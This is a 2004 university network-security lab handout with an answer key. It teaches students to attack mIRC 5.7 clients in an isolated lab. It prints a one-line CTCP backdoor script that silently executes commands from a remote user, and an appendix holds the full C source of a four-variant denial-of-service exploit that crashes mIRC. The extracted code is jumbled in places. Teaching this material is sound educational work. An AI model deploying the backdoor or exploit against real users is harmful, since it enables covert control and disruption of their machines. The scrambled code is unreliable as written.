Group Number: ___________
Member Names: _______________ _______________
Please read the entire lab and any extra materials carefully before starting. Be sure to start early enough so that you will have time to complete the lab. Answer ALL questions and be sure you turn in ALL materials listed in the Turn-in Checklist ON or BEFORE the Date Due .
Date: December 5, 2004
Date Due: December 15, 2004
Last Revised: December 5, 2004
Written by : Derek Garrett and Chandrea Dungy
The goal of this lab is to examine various tools to exploit users of the Internet
Relay Chat program.
This lab will introduce how systems can be compromised using various mIRC exploits.
Internet Relay Chat, or IRC, provides a way of communicating with people from all over the world. It consists of various separate networks of IRC servers, machines that allow users to connect to IRC. These servers are also called nets. The largest nets are Efnet,
Undernet, IRCnet, DALnet, and NewNet.
To use IRC the user runs a client program, usually ircII or mIRC, to connect to a server on one of the IRC nets. The server relays information to and from other servers on the same network. Once connected you can join one or more channels and talk with others publicly or privately in real time.
Unfortunately, while using IRC your computer may become vulnerable to attackers . If your system becomes compromised, an attacker would have full access to your computer.
This means they can access your files, scan for more systems to attack, perform denial of service attacks on other systems, delete your files, and more. Often, compromised
1
systems are used to attack other systems, making YOU appear to be responsible for the attacks.
None.
For this lab we will perform a Denial of Service attack against the WindowsXP machine. Also, there will be an introduction to mIRC scripting and how it is used maliciously.
A Denial of Service attack, also known as DoS, cause a networked computers to disconnect from a network or just crash. These attacks are sometimes also known as
"nukes", "hacking", or "cyber-attacks.”
Install mIRC version 5.7 on WinXP
Mount NAS
Copy the Lab13 folder from the NAS to your desktop
Double click on file “mirc57t.exe”
-click “next”
- “yes”
- “install”
Once mIRC is installed be sure to look at the readme file to become familiar with IRC commands and syntax.
Open mIRC
Go to File >> Options
Enter a name (do not use your real full name), email address, and a nickname
File >> Connect
Now you are connected to an IRC server.
Type
# /join #ece4112
To create a chatroom for use
Repeat the above steps for the winXP Copy machine as well. However, be sure to use a different username.
Die mIRC
From: http://www.packetstormsecurity.org/irc/
Many IRC exploits are written in C. This program listens on a port for incoming connections, then crashes mIRC using whatever exploit you choose. The code for
2
diemirc.c is found in Appendix A.
We are now going to use diemirc.c to perform a denial of service attack against the winXP copy machine.
Compile and run the file diemirc.c located in the Lab13 folder.
Enter the nickname chosen on WinXP copy
Screenshot # 1: Take a screenshot of what happens when winxp copy is booted.
Q1.1: What port does diemirc.c listen to?
Q1.2: How can you defend yourself against these attacks?
A scripting language for mIRC has evolved – users now use it to customize their clients to perform how they want it. This small language is only interpretable on the mIRC client, there are no compilers or interpreters available. With this language you can write socket scripts to connect to remote hosts, you can write scripts to take over IRC channels,
Etc.
Obviously, these commands are dangerous when used in the wrong environment. Also, there are some remotes that can be used to setup servers and backdoors without the user noticing any differences.
Remotes are mIRC interpreted programs which respond to events. There are numerous things on IRC that are considered events. For example, an event is when you get a private message, somebody says something on the channel, you are voiced, someone is banned, or you click a button in a dialog box etc.
The basic Remote structure is of three types.
on <level>:<event>: <command> on <level>:<event>:<location/parameter>: <command> on<level>:<event>:<location/parameter>:<parameter/location>
: <command>
CTCP is different from regular mIRC events. Regular mIRC events follow the IRC protocol while CTCP has it's own - Client to Client Protocol. Clients don't depend on the
IRC servers when they CTCP. CTCP remotes are also slightly different in format from the usual remotes. It's format is: ctcp (level):(text):(location): (command)
3
One line backdoor: ctcp ^*:DO:*:{ . $+ $2- | .halt } ctcp ^* : tells the script to listen for any incoming CTCP events from any user level.
DO: tells the script that the ctcp event we are listening for is DO
"*:" tells the script that the ctcp event can be in any form
{ }: curly brackets which tells the script to execute the commands enclosed in the brackets if all of the above conditions are met..
$+ $2- | .halt: makes the commands executed "invisible" to the user.
So, If somebody executes "/ctcp nickname DO msg ece4112 asdf", our remote listener listens for an incoming CTCP DO event and if we receive one it then executes the command . $+ $2-, which in this example would be ‘msg ece412 asdf.’ So our victim would message user "ece4112" the text "asdf" and the important factor here is that they would not know they have done it -- they see nothing.
Type
#ctcp ^*:DO:*:{ . $+ $2- | .halt } at the prompt
Switch to WinXP Copy and type
#/ctcp “winxp copy user” DO msg ece4112 asdf
Q2.1 What happens to user ece4112 when you type the commands? Why would this information be useful to an attacker?
Q2.2: Write your own backdoor script.
Q2.3: How can you protect yourself against these types of attacks?
4
Answer Sheet Lab 13
Group Number: _______________
Member Names: _________________________ _________________________
Q1.1: What port does diemirc.c listen to?
6667
Q1.2: Can you defend yourself against these attacks?
Regularly update your windows software with security patches, and use a firewall for additional security.
Q2.1: What happens to ece4112 when you type in the commands? Why would this information be useful to an attacker?
ECE4112 receives the message "asdf" from the wimp copy user without winXP copy knowing. This may be important because it allows them to message someone under a users name without the user knowing what happened.
Q2.2: What was your backdoor script? ctcp ^*:DO:*:{ . $+ $2- | .halt }
5
Q2.2: How would you defend yourself against these unwanted attacks?
Chat with users that you can trust, scan system for IRC like behavior, and use a firewall.
How long did it take you to complete this lab? Was it an appropriate length lab?
What corrections and or improvements do you suggest for this lab? Please be very specific and if you add new material give the exact wording and instructions you would give to future students in the new lab handout. You may cross out and edit the text of the lab on previous pages to make corrections/suggestions. Note that part of your lab grade is what improvements you make to this lab.
Information from http://www.newircusers.com/ircchat.html
http://www.irchelp.org
http://www.mircsripts.com
http://www.f-secure.com
6
/* diemirc.c - mIRC 5.7 denial of service exploits.
(c) Chopsui-cide/MmM '00
The Mad Midget Mafia - http://midgets.box.sk/
Disclaimer: this program is proof of concept code, and is not intended to be used maliciously. By using this code, you take all responsibility for any damage incurred by the use of it.
This program listens on port 6667 for incoming connections, then crashes mIRC using the exploit you choose.
*/
#include <winsock.h>
#include <stdio.h>
#define LISTEN_PORT 6667
#define TARGET_NICK "Chopsui-cide" void listen_sock(int sock, int port); void die(char *message); int poll_for_connect(int listensock); int select_sploit(); void exploit1(int s); void exploit2(int s); void exploit3(int s); void exploit4(int s); main()
{ int ls; int c;
WSADATA wsaData;
WORD wVersionRequested; wVersionRequested = MAKEWORD(1, 1); if (WSAStartup(wVersionRequested, &wsaData) < 0) die("Unable to initialise Winsock."); if ((ls = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) ==
INVALID_SOCKET) die("Unable to create socket."); c = select_sploit(); listen_sock(ls, LISTEN_PORT); printf("Waiting for connection on port %d...\n", LISTEN_PORT);
7
} ls = poll_for_connect(ls); switch (c)
{ case 0 : exploit1(ls); break; case 1 : break; case 2 : break; case 3 :
} closesocket(ls); return 0; exploit2(ls); exploit3(ls); exploit4(ls); void listen_sock(int sock, int port)
{ struct sockaddr_in addr; int c = 0; memset((char *)&addr,'0', sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = INADDR_ANY; addr.sin_port = htons(port);
} if (bind(sock, &addr, sizeof(addr)) == -1) die("Error binding socket."); if (listen(sock, 20) == -1) die("Error listening."); void die(char *message)
{
{ printf("Fatal error: %s\n", message); exit(1);
} int poll_for_connect(int listensock) struct sockaddr_in peer; int sendsock; int szpeer = sizeof(peer); do
8
}
&szpeer);
{ sendsock = accept(listensock, (struct sockaddr *) &peer,
} while(sendsock == -1); printf("Connection from [%s].\n", inet_ntoa(peer.sin_addr)); return sendsock;
#define last_select 3 int select_sploit()
{ char k; printf("Select exploit:\n0 - incomplete nick change.\n"); printf("1 - msg with loads of parameters.\n2 - incomplete mode change.\n");
} printf("3 - incomplete kick.\n"); k = getch(); if (atoi((char *)&k) > last_select)
{ printf("Invalid selection.\n"); exit(1);
} if (((int)k < 0x30) || ((int)k > 0x39))
{
} printf("Invalid selection.\n"); exit(1); return atoi((char *)&k);
/*
Exploit 1: incomplete nick change mIRC 5.7 and past versions seem to suffer from bugs involving incomplete messages. I previously e-mailed
Khaled M. Bey about one such bug, and it's fixed in this version, but there are other similiar (almost identical) bugs still in v5.7.
This attack is executed from the _server_ side.
All we need to do is send the client a half complete nick change message, ie
":<targetnick>!ident@host.com NICK"
We must put the target's current nick name where
<targetnick> is.
*/
#define END "!ident@host.com NICK\x0a" void exploit1(int s)
{
9
} char sod[256]; memset((char *)&sod, '\0', 256); sod[0] = ':'; strcat(sod, TARGET_NICK); strcat(sod, END); send(s, sod, 256, 0);
Sleep(1000); // Make sure the packet gets there.
/*
Exploit 2: server message overflow
If the client sends a large message with to many parameters, it crashes, and part of the buffer is stuffed into EAX.
}
/*
*/
#define MSG_LEN 1000 // This must be an even number. void exploit2(int s)
{ char sod[MSG_LEN]; int c = 0; do
{ sod[c] = 0xff; sod[c + 1] = ' '; c += 2;
} while(c < MSG_LEN); send(s, sod, MSG_LEN, 0);
Sleep(1000); // Make sure the packet gets there.
}
Exploit 3: incomplete mode change
This is basically the same as the nick change exploit.
*/
#define END "!ident@host.com MODE\x0a" void exploit3(int s)
{ char sod[256]; memset((char *)&sod, '\0', 256); sod[0] = ':'; strcat(sod, TARGET_NICK); strcat(sod, END); send(s, sod, 256, 0);
Sleep(1000); // Make sure the packet gets there.
10
/*
Exploit 4: incomplete kick
Another incomplete message bug.
}
{
*/
#define JOIN " JOIN #\x0a"
#define KICK ": KICK #\x0a" void exploit4(int s) char sod[256]; memset((char *)&sod, '\0', 256); sod[0] = ':'; strcat(sod, TARGET_NICK); strcat(sod, JOIN); printf("%s%s", sod, KICK); send(s, sod, strlen(sod), 0); send(s, KICK, strlen(KICK), 0);
Sleep(1000); // Make sure the packet gets there.
11